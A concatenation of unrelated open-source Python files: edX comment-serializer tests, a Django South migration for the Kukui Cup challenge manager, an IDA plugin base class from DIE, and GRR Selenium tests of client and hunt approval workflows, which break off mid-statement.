self.existing_comment = Comment(**make_minimal_cs_comment({
"id": "existing_comment",
"thread_id": "existing_thread",
"body": "Original body",
"user_id": str(self.user.id),
"course_id": unicode(self.course.id),
}))
def save_and_reserialize(self, data, instance=None):
"""
Create a serializer with the given data, ensure that it is valid, save
the result, and return the full comment data from the serializer.
"""
context = get_context(
self.course,
self.request,
make_minimal_cs_thread({"course_id": unicode(self.course.id)})
)
serializer = CommentSerializer(
instance,
data=data,
partial=(instance is not None),
context=context
)
self.assertTrue(serializer.is_valid())
serializer.save()
return serializer.data
@ddt.data(None, "test_parent")
def test_create_success(self, parent_id):
data = self.minimal_data.copy()
if parent_id:
data["parent_id"] = parent_id
self.register_get_comment_response({"thread_id": "test_thread", "id": parent_id})
self.register_post_comment_response(
{"id": "test_comment"},
thread_id="test_thread",
parent_id=parent_id
)
saved = self.save_and_reserialize(data)
expected_url = (
"/api/v1/comments/{}".format(parent_id) if parent_id else
"/api/v1/threads/test_thread/comments"
)
self.assertEqual(urlparse(httpretty.last_request().path).path, expected_url)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"body": ["Test body"],
"user_id": [str(self.user.id)],
}
)
self.assertEqual(saved["id"], "test_comment")
self.assertEqual(saved["parent_id"], parent_id)
def test_create_all_fields(self):
data = self.minimal_data.copy()
data["parent_id"] = "test_parent"
data["endorsed"] = True
self.register_get_comment_response({"thread_id": "test_thread", "id": "test_parent"})
self.register_post_comment_response(
{"id": "test_comment"},
thread_id="test_thread",
parent_id="test_parent"
)
self.save_and_reserialize(data)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"body": ["Test body"],
"user_id": [str(self.user.id)],
"endorsed": ["True"],
}
)
def test_create_parent_id_nonexistent(self):
self.register_get_comment_error_response("bad_parent", 404)
data = self.minimal_data.copy()
data["parent_id"] = "bad_parent"
context = get_context(self.course, self.request, make_minimal_cs_thread())
serializer = CommentSerializer(data=data, context=context)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors,
{
"non_field_errors": [
"parent_id does not identify a comment in the thread identified by thread_id."
]
}
)
def test_create_parent_id_wrong_thread(self):
self.register_get_comment_response({"thread_id": "different_thread", "id": "test_parent"})
data = self.minimal_data.copy()
data["parent_id"] = "test_parent"
context = get_context(self.course, self.request, make_minimal_cs_thread())
serializer = CommentSerializer(data=data, context=context)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors,
{
"non_field_errors": [
"parent_id does not identify a comment in the thread identified by thread_id."
]
}
)
@ddt.data(None, -1, 0, 2, 5)
def test_create_parent_id_too_deep(self, max_depth):
with mock.patch("django_comment_client.utils.MAX_COMMENT_DEPTH", max_depth):
data = self.minimal_data.copy()
context = get_context(self.course, self.request, make_minimal_cs_thread())
if max_depth is None or max_depth >= 0:
if max_depth != 0:
self.register_get_comment_response({
"id": "not_too_deep",
"thread_id": "test_thread",
"depth": max_depth - 1 if max_depth else 100
})
data["parent_id"] = "not_too_deep"
else:
data["parent_id"] = None
serializer = CommentSerializer(data=data, context=context)
self.assertTrue(serializer.is_valid(), serializer.errors)
if max_depth is not None:
if max_depth >= 0:
self.register_get_comment_response({
"id": "too_deep",
"thread_id": "test_thread",
"depth": max_depth
})
data["parent_id"] = "too_deep"
else:
data["parent_id"] = None
serializer = CommentSerializer(data=data, context=context)
self.assertFalse(serializer.is_valid())
self.assertEqual(serializer.errors, {"parent_id": ["Comment level is too deep."]})
def test_create_missing_field(self):
for field in self.minimal_data:
data = self.minimal_data.copy()
data.pop(field)
serializer = CommentSerializer(
data=data,
context=get_context(self.course, self.request, make_minimal_cs_thread())
)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors,
{field: ["This field is required."]}
)
def test_create_endorsed(self):
# TODO: The comments service doesn't populate the endorsement field on
# comment creation, so this is sadly realistic
self.register_post_comment_response({}, thread_id="test_thread")
data = self.minimal_data.copy()
data["endorsed"] = True
saved = self.save_and_reserialize(data)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"body": ["Test body"],
"user_id": [str(self.user.id)],
"endorsed": ["True"],
}
)
self.assertTrue(saved["endorsed"])
self.assertIsNone(saved["endorsed_by"])
self.assertIsNone(saved["endorsed_by_label"])
self.assertIsNone(saved["endorsed_at"])
def test_update_empty(self):
self.register_put_comment_response(self.existing_comment.attributes)
self.save_and_reserialize({}, instance=self.existing_comment)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"body": ["Original body"],
"course_id": [unicode(self.course.id)],
"user_id": [str(self.user.id)],
"anonymous": ["False"],
"anonymous_to_peers": ["False"],
"endorsed": ["False"],
}
)
def test_update_all(self):
cs_response_data = self.existing_comment.attributes.copy()
cs_response_data["endorsement"] = {
"user_id": str(self.user.id),
"time": "2015-06-05T00:00:00Z",
}
self.register_put_comment_response(cs_response_data)
data = {"raw_body": "Edited body", "endorsed": True}
saved = self.save_and_reserialize(data, instance=self.existing_comment)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"body": ["Edited body"],
"course_id": [unicode(self.course.id)],
"user_id": [str(self.user.id)],
"anonymous": ["False"],
"anonymous_to_peers": ["False"],
"endorsed": ["True"],
"endorsement_user_id": [str(self.user.id)],
}
)
for key in data:
self.assertEqual(saved[key], data[key])
self.assertEqual(saved["endorsed_by"], self.user.username)
self.assertEqual(saved["endorsed_at"], "2015-06-05T00:00:00Z")
@ddt.data("", " ")
def test_update_empty_raw_body(self, value):
serializer = CommentSerializer(
self.existing_comment,
data={"raw_body": value},
partial=True,
context=get_context(self.course, self.request)
)
self.assertEqual(
serializer.errors,
{"raw_body": ["This field is required."]}
)
@ddt.data("thread_id", "parent_id")
def test_update_non_updatable(self, field):
serializer = CommentSerializer(
self.existing_comment,
data={field: "different_value"},
partial=True,
context=get_context(self.course, self.request)
)
self.assertEqual(
serializer.errors,
{field: ["This field is not allowed in an update."]}
)
| agpl-3.0 | -5,285,214,356,977,623,000 | 37.819653 | 110 | 0.564043 | false |
justintweaver/mtchi-cert-game | makahiki/apps/managers/challenge_mgr/migrations/0009_auto__del_field_challengesetting_location.py | 7 | 8591 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'ChallengeSetting.location'
db.delete_column('challenge_mgr_challengesetting', 'location')
def backwards(self, orm):
# Adding field 'ChallengeSetting.location'
db.add_column('challenge_mgr_challengesetting', 'location', self.gf('django.db.models.fields.CharField')(default='', max_length=50), keep_default=False)
models = {
'challenge_mgr.challengesetting': {
'Meta': {'object_name': 'ChallengeSetting'},
'about_page_text': ('django.db.models.fields.TextField', [], {'default': '"For more information, please go to <a href=\'http://kukuicup.org\'>kukuicup.org</a>."'}),
'cas_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###I have a CAS email'", 'max_length': '255'}),
'cas_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'contact_email': ('django.db.models.fields.CharField', [], {'default': "'[email protected]'", 'max_length': '100'}),
'domain': ('django.db.models.fields.CharField', [], {'default': "'localhost'", 'max_length': '100'}),
'email_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_host': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'email_port': ('django.db.models.fields.IntegerField', [], {'default': '587'}),
'email_use_tls': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###Others'", 'max_length': '255'}),
'landing_introduction': ('django.db.models.fields.TextField', [], {'default': "'Aloha! Welcome to the Kukui Cup.'", 'max_length': '500'}),
'landing_non_participant_text': ('django.db.models.fields.TextField', [], {'default': "'###I am not registered.'", 'max_length': '255'}),
'landing_participant_text': ('django.db.models.fields.TextField', [], {'default': "'###I am registered'", 'max_length': '255'}),
'landing_slogan': ('django.db.models.fields.TextField', [], {'default': "'The Kukui Cup: Lights off, game on!'", 'max_length': '255'}),
'ldap_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###I have a LDAP email'", 'max_length': '255'}),
'ldap_search_base': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'ldap_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Kukui Cup'", 'max_length': '50'}),
'team_label': ('django.db.models.fields.CharField', [], {'default': "'Team'", 'max_length': '50'}),
'theme': ('django.db.models.fields.CharField', [], {'default': "'theme-forest'", 'max_length': '50'}),
'use_cas_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_internal_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_ldap_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'wattdepot_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'challenge_mgr.gameinfo': {
'Meta': {'ordering': "['priority']", 'object_name': 'GameInfo'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'})
},
'challenge_mgr.gamesetting': {
'Meta': {'ordering': "['game', 'widget']", 'unique_together': "(('game', 'widget'),)", 'object_name': 'GameSetting'},
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.GameInfo']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'widget': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'challenge_mgr.pageinfo': {
'Meta': {'ordering': "['priority']", 'object_name': 'PageInfo'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'introduction': ('django.db.models.fields.TextField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'unlock_condition': ('django.db.models.fields.CharField', [], {'default': "'True'", 'max_length': '255'}),
'url': ('django.db.models.fields.CharField', [], {'default': "'/'", 'max_length': '255'})
},
'challenge_mgr.pagesetting': {
'Meta': {'ordering': "['page', 'location', 'priority']", 'unique_together': "(('page', 'widget'),)", 'object_name': 'PageSetting'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'Left'", 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.PageInfo']"}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'widget': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'})
},
'challenge_mgr.roundsetting': {
'Meta': {'ordering': "['start']", 'object_name': 'RoundSetting'},
'display_scoreboard': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'end': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 3, 4, 9, 51, 46, 415018)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Round 1'", 'max_length': '50'}),
'round_reset': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'start': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 25, 9, 51, 46, 414965)'})
},
'challenge_mgr.sponsor': {
'Meta': {'ordering': "['priority', 'name']", 'object_name': 'Sponsor'},
'challenge': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.ChallengeSetting']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'logo_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': "'1'"}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'challenge_mgr.uploadimage': {
'Meta': {'object_name': 'UploadImage'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['challenge_mgr']
| gpl-3.0 | 3,453,334,790,086,132,000 | 77.1 | 176 | 0.555814 | false |
xujun10110/DIE | DIE/Lib/DataPluginBase.py | 8 | 6517 |
import logging
from yapsy.PluginManager import IPlugin
from DIE.Lib.ParsedValue import ParsedValue
from idaapi import *
from idautils import *
from idc import *
class DataPluginBase(IPlugin):
"""
DIE Data Parser plugin base class.
"""
name = ""
version = 0
description = ""
author = ""
is_activated = True
supported_types = [] # supported_types hold tuples containing the supported type name and the type description
type = None # The value type (or None if unidentified).
loc = None # The value (memory) location.
rawValue = None # The raw value to be parsed.
parsedValues = [] # List of the parsed values.
typeName_norm_cb = None # Type name normalizer callback function
def __init__(self):
self.logger = logging.getLogger(__name__)
self.type_params = None # Currently parsed type parameters
def initPlugin(self, type_norm_callback=None):
"""
Plguin Initialization
@param type_norm_callback: a type name normalization callback function
"""
idaapi.msg("Initializing plugin %s\n" % self.__class__)
# Set type name normalization callback function
if type_norm_callback is not None:
self.typeName_norm_cb = type_norm_callback
# Register supported types
self.registerSupportedTypes()
def guessValues(self, rawData):
"""
"Abstract" method to be implemented by successors
If type is not known, used to guess possible values matching rawData.
@param rawData: Raw data who`s type should be guessed.
"""
def matchType(self, type):
"""
"Abstract" method to be implemented by successors.
Checks if the type is supported by the current plugin.
@param type: And type_info_t object to match
@return: True if a match was found, otherwise False
"""
return True
def parseValue(self, rawData):
"""
"Abstract" method to be implemented by successors.
If type is known, Parses the value.
@param rawData: Raw data who`s type should be parsed.
@param type: IDA type_info_t object
"""
def registerSupportedTypes(self):
"""
A parser can register supported types in order to allow quick parser lookups.
types are registered by their type name string value.
registration should be made using self.addSuportedType()
"""
def run(self, rawData, type, match_override=False):
"""
Run Plugin
@param rawData: the raw data to be parsed
@param type: data type (None if unknown)
@param match_override: set this flag in order to bypass the plugin type matching method.
@return: DebugValue array with the parsed data
"""
try:
self.parsedValues = [] # Initialize parsed value list
# If type was not recognized, try to guess the value.
if type is None:
self.guessValues(rawData)
return self.parsedValues
# If bypass match flag is set, force parsing.
if match_override:
self.parseValue(rawData)
return self.parsedValues
# Otherwise, if type matches the plugin parser type, run the parser logic.
if self.matchType(type):
self.parseValue(rawData)
return self.parsedValues
except Exception as ex:
self.logger.exception("Error while running plugin: %s", ex)
def setPluginType(self, type):
"""
Set the plugin type string that will be associated with values parsed by this parser
@param type: Type string (e.g. "INT")
@return: True if type was successfully set, otherwise False.
"""
try:
self.type = type.lower()
except Exception as ex:
self.logger.exception("Setting plugin type failed: %s", ex)
return False
def addSuportedType(self, type_name, type_desc):
"""
Add supported type to supported type list
@param type_name: supported type name string
@param type_desc: type description
"""
# type description must not be Null. set to an empty string by default.
try:
if type_desc is None:
type_desc = ""
type_name = self.typeName_norm_cb(type_name)
type_tuple = (type_name, type_desc)
if not type_tuple in self.supported_types:
self.supported_types.append(type_tuple)
except Exception as ex:
self.logger.exception("Failed to add supported type: %s", ex)
def checkSupportedType(self, type):
"""
Check if a type name string is supported
@param type: IDA type_into_t object
@return: True if type name is supported or otherwise False
"""
try:
tname = idaapi.print_tinfo('', 0, 0, idaapi.PRTYPE_1LINE, type, '', '')
type_name = None
if self.typeName_norm_cb is not None:
type_name = self.typeName_norm_cb(tname)
for (stype, sparams) in self.supported_types:
if type_name == stype:
self.type_params = sparams
return True
return False
except Exception as ex:
self.logger.exception("Error while checking for supported type: %s", ex)
def getSupportedTypes(self):
"""
Get a list in which each element is a tuple that contains:
[1] supported type name
[2] type description parameters
(type names are strings stripped of all spaces, e.g "UNSIGNED CHAR *" will be returned as "UNSIGNEDCHAR*")
@return: list of TypeTuples
"""
if len(self.supported_types) > 0:
return self.supported_types
else:
return None
def addParsedvalue(self, value, score=0, description="NoN", raw=None):
"""
Add a parsed value to the parsed value list
"""
parsed_val = ParsedValue(value, description, score, raw, self.type)
self.parsedValues.append(parsed_val)
def getParsedValues(self):
"""
Get the parsed values list
@return: Parsed value list (with 'ParsedValue' element types)
"""
return self.parsedValues
| mit | 6,281,305,150,474,836,000 | 32.081218 | 120 | 0.59644 | false |
ojengwa/grr | gui/plugins/acl_manager_test.py | 2 | 24429 | #!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""Tests the access control authorization workflow."""
import re
import time
import urlparse
from grr.gui import runtests_test
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import email_alerts
from grr.lib import flags
from grr.lib import flow
from grr.lib import hunts
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
from grr.lib.aff4_objects import cronjobs
class TestACLWorkflow(test_lib.GRRSeleniumTest):
"""Tests the access control workflow."""
# Using an Unicode string for the test here would be optimal but Selenium
# can't correctly enter Unicode text into forms.
reason = "Felt like it!"
def CreateSampleHunt(self, token=None):
with hunts.GRRHunt.StartHunt(
hunt_name="SampleHunt",
regex_rules=[rdfvalue.ForemanAttributeRegex(
attribute_name="GRR client",
attribute_regex="GRR")],
token=token or self.token) as hunt:
return hunt.session_id
def WaitForNotification(self, user):
sleep_time = 0.2
iterations = 50
for _ in xrange(iterations):
try:
fd = aff4.FACTORY.Open(user, "GRRUser", mode="r", ignore_cache=True,
token=self.token)
pending_notifications = fd.Get(fd.Schema.PENDING_NOTIFICATIONS)
if pending_notifications:
return
except IOError:
pass
time.sleep(sleep_time)
self.fail("Notification for user %s never sent." % user)
def testClientACLWorkflow(self):
self.Open("/")
self.Type("client_query", "0001")
self.Click("client_query_submit")
self.WaitUntilEqual(u"C.0000000000000001",
self.GetText, "css=span[type=subject]")
# Choose client 1
self.Click("css=td:contains('0001')")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsElementPresent,
"css=h3:contains('Create a new approval')")
# This asks the user "test" (which is us) to approve the request.
self.Type("css=input[id=acl_approver]", "test")
self.Type("css=input[id=acl_reason]", self.reason)
self.ClickUntilNotVisible("acl_dialog_submit")
self.WaitForNotification("aff4:/users/test")
# User test logs in as an approver.
self.Open("/")
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.ClickUntilNotVisible(
"css=td:contains('grant access to GRR client')")
self.WaitUntilContains("Grant Access for GRR Use",
self.GetText, "css=h2:contains('Grant')")
self.WaitUntil(self.IsTextPresent, "The user test has requested")
self.Click("css=button:contains('Approve')")
self.WaitUntil(self.IsTextPresent,
"You have granted access for C.0000000000000001 to test")
self.WaitForNotification("aff4:/users/test")
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.ClickUntilNotVisible("css=td:contains('has granted you access')")
# This is insufficient - we need 2 approvers.
self.WaitUntilContains("Requires 2 approvers for access.",
self.GetText, "css=div#acl_form")
# Lets add another approver.
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(client_id="C.0000000000000001",
flow_name="GrantClientApprovalFlow",
reason=self.reason, delegate="test",
subject_urn=rdfvalue.ClientURN("C.0000000000000001"),
token=token)
# Try again:
self.Open("/")
self.Click("notification_button")
self.ClickUntilNotVisible("css=td:contains('has granted you access')")
self.Click("css=span:contains('fs')")
# This is ok - it should work now
self.WaitUntilContains("aff4:/C.0000000000000001/fs",
self.GetText, "css=h3:contains('fs')")
# One email for the original request and one for each approval.
self.assertEqual(len(self.emails_sent), 3)
def testRecentReasonBox(self):
test_reason = u"ástæða"
self.Open("/")
with self.ACLChecksDisabled():
token = access_control.ACLToken(
username="test",
reason=test_reason)
self.GrantClientApproval("C.0000000000000006", token=token)
self.Type("client_query", "0006")
self.Click("client_query_submit")
self.WaitUntilEqual(u"C.0000000000000006",
self.GetText, "css=span[type=subject]")
# Choose client 6
self.Click("css=td:contains('0006')")
self.WaitUntil(self.IsTextPresent, u"Access reason: %s" % test_reason)
# By now we should have a recent reason set, let's see if it shows up in the
# ACL dialog.
self.Type("client_query", "0001")
self.Click("client_query_submit")
self.WaitUntilEqual(u"C.0000000000000001",
self.GetText, "css=span[type=subject]")
# Choose client 1
self.Click("css=td:contains('0001')")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsElementPresent,
"css=h3:contains('Create a new approval')")
options = self.GetText("css=select[id=acl_recent_reasons]").split("\n")
self.assertEqual(len(options), 2)
self.assertEqual(options[0].strip(), "Enter New Reason...")
self.assertEqual(options[1].strip(), test_reason)
# The reason text box should be there and enabled.
element = self.GetElement("css=input[id=acl_reason]")
self.assertTrue(element.is_enabled())
self.Select("css=select[id=acl_recent_reasons]", test_reason)
# Make sure clicking the recent reason greys out the reason text box.
element = self.GetElement("css=input[id=acl_reason]")
self.assertFalse(element.is_enabled())
# Ok now submit this.
self.Type("css=input[id=acl_approver]", "test")
self.ClickUntilNotVisible("acl_dialog_submit")
# And make sure the approval was created...
fd = aff4.FACTORY.Open("aff4:/ACL/C.0000000000000001/test",
token=self.token)
approvals = list(fd.ListChildren())
self.assertEqual(len(approvals), 1)
# ... using the correct reason.
self.assertEqual(
utils.SmartUnicode(approvals[0].Basename().decode("base64")),
test_reason)
def testHuntACLWorkflow(self):
with self.ACLChecksDisabled():
hunt_id = self.CreateSampleHunt()
# Open up and click on View Hunts.
self.Open("/")
self.WaitUntil(self.IsElementPresent, "client_query")
self.Click("css=a[grrtarget=ManageHunts]")
self.WaitUntil(self.IsTextPresent, "SampleHunt")
# Select a Hunt.
self.Click("css=td:contains('SampleHunt')")
# Click on Run and wait for dialog again.
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsElementPresent,
"css=h3:contains('Create a new approval')")
# This asks the user "test" (which is us) to approve the request.
self.Type("css=input[id=acl_approver]", "test")
self.Type("css=input[id=acl_reason]", self.reason)
self.Click("acl_dialog_submit")
# "Request Approval" dialog should go away
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitForNotification("aff4:/users/test")
self.Open("/")
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.ClickUntilNotVisible(
"css=td:contains('Please grant access to hunt')")
self.WaitUntilContains("Grant Access for GRR Use",
self.GetText, "css=h2:contains('Grant')")
self.WaitUntil(self.IsTextPresent, "The user test has requested")
# Hunt overview should be visible
self.WaitUntil(self.IsTextPresent, "SampleHunt")
self.WaitUntil(self.IsTextPresent, "Hunt ID")
self.WaitUntil(self.IsTextPresent, "Hunt URN")
self.WaitUntil(self.IsTextPresent, "Clients Scheduled")
self.Click("css=button:contains('Approve')")
self.WaitUntil(self.IsTextPresent,
"You have granted access for %s to test" % hunt_id)
self.WaitForNotification("aff4:/users/test")
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.WaitUntil(self.GetText,
"css=td:contains('has granted you access to hunt')")
self.ClickUntilNotVisible(
"css=tr:contains('has granted you access') a")
# Run SampleHunt (it should be selected by default).
self.WaitUntil(self.IsTextPresent, "SampleHunt")
# Click on Run and wait for dialog again.
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This is insufficient - we need 2 approvers.
self.WaitUntilContains("Requires 2 approvers for access.",
self.GetText, "css=div#acl_form")
# Lets add another approver.
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantHuntApprovalFlow",
subject_urn=hunt_id, reason=self.reason,
delegate="test",
token=token)
self.WaitForNotification("aff4:/users/test")
self.Open("/")
# We should be notified that we have an approval
self.WaitUntilEqual("1", self.GetText, "notification_button")
self.Click("notification_button")
self.ClickUntilNotVisible(
"css=tr:contains('has granted you access') a")
# Wait for modal backdrop to go away.
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsTextPresent, "SampleHunt")
# Run SampleHunt (it should be selected by default).
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This is still insufficient - one of the approvers should have
# "admin" label.
self.WaitUntilContains("At least 1 approver(s) should have 'admin' label.",
self.GetText, "css=div#acl_form")
# Let's make "approver" an admin.
with self.ACLChecksDisabled():
self.CreateAdminUser("approver")
# And try again
self.Open("/")
self.WaitUntil(self.IsElementPresent, "client_query")
self.Click("css=a[grrtarget=ManageHunts]")
self.WaitUntil(self.IsTextPresent, "SampleHunt")
# Select and run SampleHunt.
self.Click("css=td:contains('SampleHunt')")
# Run SampleHunt (it should be selected by default).
self.WaitUntil(self.IsTextPresent, "SampleHunt")
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for the success status message.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Hunt started successfully!")
def Create2HuntsForDifferentUsers(self):
# Create 2 hunts. Hunt1 by "otheruser" and hunt2 by "test".
# Both hunts will be approved by user "approver".
with self.ACLChecksDisabled():
hunt1_id = self.CreateSampleHunt(
token=access_control.ACLToken(username="otheruser"))
hunt2_id = self.CreateSampleHunt(
token=access_control.ACLToken(username="test"))
self.CreateAdminUser("approver")
token = access_control.ACLToken(username="otheruser")
flow.GRRFlow.StartFlow(flow_name="RequestHuntApprovalFlow",
subject_urn=hunt1_id,
reason=self.reason,
approver="approver",
token=token)
token = access_control.ACLToken(username="test")
flow.GRRFlow.StartFlow(flow_name="RequestHuntApprovalFlow",
subject_urn=hunt2_id,
reason=self.reason,
approver="approver",
token=token)
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantHuntApprovalFlow",
subject_urn=hunt1_id, reason=self.reason,
delegate="otheruser",
token=token)
token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantHuntApprovalFlow",
subject_urn=hunt2_id, reason=self.reason,
delegate="test",
token=token)
def testHuntApprovalsArePerHunt(self):
with self.ACLChecksDisabled():
self.Create2HuntsForDifferentUsers()
self.Open("/")
self.WaitUntil(self.IsElementPresent, "client_query")
self.Click("css=a[grrtarget=ManageHunts]")
self.WaitUntil(self.IsTextPresent, "SampleHunt")
#
# Check that test user can't start/pause/modify hunt1.
#
self.Click("css=tr:contains('SampleHunt') td:contains('otheruser')")
# Run hunt
# Click on Run button and check that dialog appears.
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("css=button[name=Proceed]")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsTextPresent, "Create a new approval")
self.WaitUntil(self.IsTextPresent, "No approvals available")
self.Click("css=#acl_dialog button[name=Close]")
# Wait for dialog to disappear.
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsElementPresent,
"css=button[name=ModifyHunt]:not([disabled])")
# Modify hunt
# Click on Modify button and check that dialog appears.
self.Click("css=button[name=ModifyHunt]")
self.WaitUntil(self.IsTextPresent, "Modify a hunt")
self.WaitUntil(self.IsElementPresent, "css=input[id=v_-client_limit]")
# Click on "Proceed" and wait for authorization dialog to appear.
self.Click("name=Proceed")
# This should be rejected now and a form request is made.
self.WaitUntil(self.IsTextPresent, "Create a new approval")
self.WaitUntil(self.IsTextPresent, "No approvals available")
self.Click("css=#acl_dialog button[name=Close]")
# Wait for dialog to disappear.
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
#
# Check that test user can start/pause/modify hunt2.
#
self.Click("css=tr:contains('SampleHunt') td:contains('test')")
# Run hunt
# Click on Run and wait for dialog again.
self.Click("css=button[name=RunHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to run this hunt?")
# Click on "Proceed" and wait for success label to appear.
# Also check that "Proceed" button gets disabled.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Hunt started successfully")
self.assertTrue(self.IsElementPresent(
"css=button[name=Proceed][disabled!='']"))
# Click on "Cancel" and check that dialog disappears.
self.Click("css=button[name=Cancel]")
self.WaitUntilNot(self.IsVisible, "css=.modal-backdrop")
self.WaitUntil(self.IsElementPresent,
"css=button[name=PauseHunt]:not([disabled])")
# Pause hunt
# Click on Pause and wait for dialog again.
self.Click("css=button[name=PauseHunt]")
self.WaitUntil(self.IsTextPresent,
"Are you sure you want to pause this hunt?")
# Click on "Proceed" and wait for success label to appear.
# Also check that "Proceed" button gets disabled.
self.Click("css=button[name=Proceed]")
self.WaitUntil(self.IsTextPresent, "Hunt paused successfully")
self.assertTrue(self.IsElementPresent(
